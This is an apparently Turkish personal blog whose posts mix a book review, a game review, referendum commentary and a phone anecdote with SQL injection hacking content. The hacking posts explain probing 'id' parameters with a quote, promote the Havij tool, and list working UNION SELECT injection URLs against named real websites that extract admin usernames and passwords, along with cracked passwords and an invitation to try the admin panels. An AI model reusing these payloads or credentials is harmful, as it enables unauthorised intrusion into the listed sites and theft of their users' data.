Hedef Sitede Sql İnjection Açığı Nasıl Bulunur?

En çok sorulan sorulardan biri ;
-Hedef sitede sql injection açığı nasıl bulunur?
Bilindiği üzere sql veritabanındaki kayıtlara ''id'' değeri verir. Biz de bu ''id'' değerini kullanarak siteyi hataya zorlarız. Peki bu nasıl olur? Örneklendirelim ;
Sitemiz sqluzmani.com olsun. Öncelikle sitede ''id'' değeri bulalım. Bunun için sitede biraz gezmek yeterli ancak olur da bulamazsanız google Hoca'ya site:sqluzmani.com yazıp aratırsak bu sitenin google'ın indexlediği bütün sayfalarını görürüz. Arattık ve bulduk diyelim:
sqluzmani.com/ders.php?id=1
Bundan sonra açığı yakalamak için birden fazla yol var ancak ben en çok ('a) ile yapıyorum. Hemen devam edelim ve sitenin sonuna ekleyelim:
sqluzmani.com/ders.php?id=1'a
Bunu yazdığımızda sitede 3 değişik hata olabilir.
-Sitede bir değişiklik olur,
-You have an error in your SQL syntax near......,
-Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in......
Bu hatalardan en az birini aldığınız zaman sql injection var demektir. Ancak her açık olan site hacklenebilir demek yanlış olur. Forbidden ve 404 hatası verebilir daha sonra bunları bypass etmeyi de anlatıcağım. Bu yazının videosunu en yakın zamanda çekeceğim.

Sql İnjection Havij Kullanımı Video 2

Havij programının kullanımını anlattığım 2. video. Umarım Yardımcı olur.

Video Link ; http://mikiurl.com/uWziC

Sql İnjection Havij İndir (Resmi Site)

Uzun aradan sonra tekrar merhaba arkadaşlar. Blog'la pek ilginemedim kusura bakmayın. Havij kullanımını gösterdiğim videonun ve havij'in linkleri malumunuz kırılmış. Laptop'ın ekran kartı yandı videoyu tekrar upload edemeyebilrim ama en yakın zamanda yeni videolar çekeceğim. Şimdilik havij'i indirebileceğiniz bir link vereceğim. Havij proğramının resmi sitesidir:

Havij indir : www.itsecteam.com/en/projects/project1_page2.htm

PR 6 Site Sql İnjection Örnek Site

Evet arkadaşlar uzun zamandır sql konusunda bişiler yazmıyorum. Bu aralar biraz kalabalık kafamın içi şimdilik açık bulduğum bu siteyi paylaşıcam.

http://www.lrd.org.uk/issue.php?pagid=1&issueid=-1380%20union%20select%201,username,password,4%20from%20admin_users--

MD5 = blackbird

Admin Paneline Bakmadım. Siz Uğraşın.. ;)

Piç Fantazi Kitabı Üstüne

Çukurova'nın malum sıcağından bunalarak uzun uğraşlarım sonucu bu kitabı bitirebildim arkadaşlar. Uzun uğraşlarım sonucu derken kitabın sıkıcı filan olduğunu düşündüğümden değil aksine kitap gayet başarılı. Zar Adam'ın yazarı Luke Rhihart'ın hayal gücünün ne kadar zorlayabileceğini görmek benim için çok heyecanlıydı. Yüce Şans Tanrısı'nın "Nihai Gerçeği" bulması için Dünyaya gönderdiği oğlu (piç'i) Whim'in başından geçen ilğinç olayları anlatıyor kitap. İnsanoğlunun oturup düşününce hayal gücünün sınırlarının olmadığının farkına varacaksınız kitabı okuyunca. Kitapta Whim dışında Billy , Down ve Kum Tanesi kişilikleri ön planda. Her ne kadar kitabın ana karakteri ya da piç'i Whim olsa da benim en sevdiğim karakter Bily :) Çocukta müthiş ticaret kafası var. Neyse arkadaşlar ben lafı fazla uzatmayayım. Kitabı okudum ve pişman olmadım. Size de tavsiye ederim bence okunması gereken bir kitap. Siz de okuyun pişman olmicaksınız...

Yeni Takıntım Crossfire

2 ay önce yine can sıkıntısıyla o site senin bu site benim gezip önüme gelen linklere tıkladığım bir günde farkettim bu oyunu. Resimlerine baktım ilgimi çekti hemen indirip kurdum.
Oyunun dikkatimi çeken ilk özelliği grafik özellikleriydi. Özellikle de online cs 1.6 oynayanlar yani benim gibi daha çabuk farkedebilirler bunu. 
Oyunda 2 grup var: Black List ile Global Risk. Cs'deki counter-terörist ilişkisi anlicağınız. Oyunun silahları ve ekipmanları çok çeşitli tabi hemen bunu bir bedelinin olduğuınu belirtmek gerekiyor. İndirmek ve oynamak için herhangi bir ücret ödemiyorsunuz ancak yok ben bu yola baş koydum ilerlemek ruhumda var derseniz cebinizin de biraz paralı olmanız gerekiyor. Saçınız , silahlarınız , bombalarınız , bıçaklarınız hatta savaşçınızın cinsiyetini bile bu yolla değiştirebiliyorsunuz. Oyunda clanlar kurabilir ya da clanlara katılabilirsiniz. 
    Oyunun ilginç özelliklerinden biri de rank atlayarak askeri rütbe alabilmeniz. Oyun içinde yaptığınız headshotlar multi-kill'ler ve ölüm sayınızın az olması size exp olarak geri dönüyor ve rank atlamanızda yardımcı oluyor. Rütbelerde mareşalliğe kadar çıkabilirsiniz ama ben 2 aydır oyuyorum mareşal görmedim :)..
     Oyunun ciddi Türk fanı var. Türkler arasında çok populer anlaşılan ama ben yinede csden yanayım.. Ancak yine de denemenizi tavsiye ederim:) 

Burdan Oyunu İndirebilirsiniz : http://crossfire.z8games.com/z8ld_cf_newer_1.aspx
   

Nedir Bu Referandum?

Türkiye'nin gündemiin en şaşalı olgusu şuan referandum. Partilerin rengi , siyasi görüşleri veya ideolajik yapıları ne olursa olsun bir referandumun etrafında evetçiler hayırlıcılar olarak toplanmaları çok ilgincime gider oldu. Bende dedim ki nedir bu referandum. İlgimi çeken maddeleri birazdan paylaşacağım ancak baştan söyleyim canım ülkemin bu hallerini görmek evet veya hayır demekten daha zor. neyse arkadaşlar geçelim referandumun ilgimi çeken maddelerine..

MADDE 1: Pozitif ayrımcılığın kapsamı genişletiliyor. Anayasa'nın 10. maddesine "Çocuklar, yaşlılar ve özürlüler ile harp ve vazife şehitlerinin dul ve yetimleri ile malul ve gaziler için alınacak tedbirler eşitlik ilkesine aykırı sayılmaz." ibaresi ekleniyor.

Çöpçülüğün bile istismar edildiği ülkemde pozitif ayrımcılığın ( görünürde iyi olsa bile) ilerde istismar edileceğini tahmin etmiyorum adım gibi biliyorum hele ki anayasa ile hukuksal zeminde sabitlenirse..

MADDE 7: Grev esnasında greve katılan işçilerin ve sendikanın kasıtlı veya kusurlu hareketleri sonucu grev uygulanan işyerinde sebep oldukları maddi zarardan sendikanın sorumlu tutulmasını öngörüyor. Siyasi amaçlı grev ve lokavt, genel grev ve lokavt, işyeri işgali, iş yavaşlatma ve diğer direnişlere ilişkin yasaklar kaldırılıyor

 İşçilerimizin üstündeki yük çok azmış gibi olası zararları işçiler karşılayacakmış şimdi diyebilirsiniz onlarda grev yapmasınlar zarar vermesinler ama ne yazık kı canım ülkemde hak verilmiyor alınıyor. Durum böyle olunca da grev kaçınılmaz oluyor.

MADDE 10: Milletvekilliğinin düşürülmesi uygulamasını kaldırıyor 


Yani şöyle bunun anlamı bir insanı yanlışlıkla millet vekili filan seçereseniz onu degiştirmek için bi dahaki seçimi beklemek zorundasınız.

MADDE 23: Hakimler ve Savcılar Yüksek Kurulu'nun (HSYK) yapısı değiştiriliyor. Bu kapsamda, halen 7 olan HSYK'nın üye sayısı 22'ye çıkarılacak. Adalet bakanı olmaya devam edecek.

Şuan yargının siyasallaştığını söyleyen zihniyet yasayı degiştirerek yargıyı daha da siyasileştirmeye ve sivil diktaya zorluyor(?)


MADDE 25: 12 Eylül darbecilerine yargı yolu açılıyor. Anayasa'nın, 12 Eylül dönemindeki Milli Güvenlik Konseyi üyeleri ile bu dönemde kurulan hükümetler ve Danışma Meclisi'nde görev alanların yargılanmasını önleyen geçici 15. maddesi yürürlükten kaldırılıyor.


12 Eylül'den bu yana o kadar zaman geçmesine rağmen şuan suçluların cezasını çekmelerini bende istiyorum ancak şuan yüzde sekseni ölü iger yuzde yirmisi ise yaşlanmış. Bu madde 12 Eylül'de canı yanmış olanların (bizde varız) duygularıyla oynayıp bunu paravan olarak kullanarak evet oyunu almak amacıyla konmuş gibi geliyor bana..

Evet arkadaşlar benim düşüncelerim bunlar. Herne kadar geçerli siyasi partilere gıcık olsam da oyum 'HAYIR' olacak. Şimdi diyebilirsiniz çok yanlı bir yazı olmuş. Keşke herkes yanın açıkça söyleyebilecek kadar cesur ve bilgili olsa.. Takdir Sizin...

E71 ve Ben..

İlk görüşte aşktı bizimkisi. Onu vitrinde gördüğümde tek düşündüğüm şey ona sahip olmakti. Fiyatına bakma cesaretini göstermem gerektiğini kendime kabul ettirmeye çalışırken içeriden yüzünü şuan hatırlamadığım bi bayan çıktı. Elinde telefon fiyatlarını yazan küçük afişler vardı ve bunları mağazanın camına asmaya başladı. Korkulan olmuştu. 2. afiş onun afişiydi. Gözümü kısarak yavaşça baktım ve artık kader ağlarını örmüştü. Fiyatı cebimdeki paranın 4 katı ve hayatımda boyunca kendi başıma biriktirdiğim paranın 140tl fazlasıydı. Umutlarım tükenmiş bir şekilde eve gelmiştim. Hemen uyumaya çalışacakken içeriye abim girdi. Yeni telefonu bana göstermek için gelmişti. Ve olan oldu. Oydu. O gün abimden nasıl aldığımı ya da uğruna abime neler vaadettiğimi hatırlamıyorum bile. Ama şimdi onunlayım ve şuan hiçbir şikayetim yok. Hatta geçenlerde onunla hack yaptım :).. Mutlu sonlara alışık olmasam da mutlu biten hikayeyi bitirmenin hoşnutsuzluğu , e71 ile olan ilişkimin hayatımda ki diğer bütün ilişkilerden farklı olmasının verdiği huzur ve mutluluğumu paylaşmanın verdiği sevinç duygusu ile...Mutlu sonlara...

Sql Hack Örnek Site

Burada sql açığı bulduğum siteleri paylaşacağım arkadaşlar.. Sizde burdan takip edip sql hack konusunda kendinizi geliştirebilirsiniz...

http://www.megacenteristanbul.com/editorhaberleri.php?editorid=2&haberid=-3280%20union%20select%201,2,3,4,5,username,7,sifre,9,10,11,12,13,14,15,16,17%20from%20uyeler--

http://www.odc-center.com/magaza.php?Id=-9%20union%20select%201,2,3,group_concat%28login,0x3a,password%29,5,6,7,8,9%20from%20kullanici--

http://www.deltasport.org/detay.php?ID=-104%20union%20select%201,group_concat%28username,0x3a,sifre%29,3,4,5,6,7,8,9%20from%20delta_users--

http://www.allurecosmeticsolutions.com/info.php?id=-7%20union%20select%201,2,password,4,5,6,7,8,9,username,11,12%20from%20cc_user--



MD5: allure888

http://www.ymtltd.co.uk/new.php?id=-11%20union%20select%201,2,3,password,5,6,7,8,9,10,11,12,13,username,
15,16%20from%20users--

Sql İnjection Havij Kulanımı Video

Sql injection için sizler için upload ettiğim havij programının kullanımı bu videoda anlatmaya çalıştım arkadaşlar. Umarım yararınıza olur.

Video linki : BURDAN

Rar şifresi  : sqluzmani.blogspot.com


En yakın zamanda linkler yenilecektir.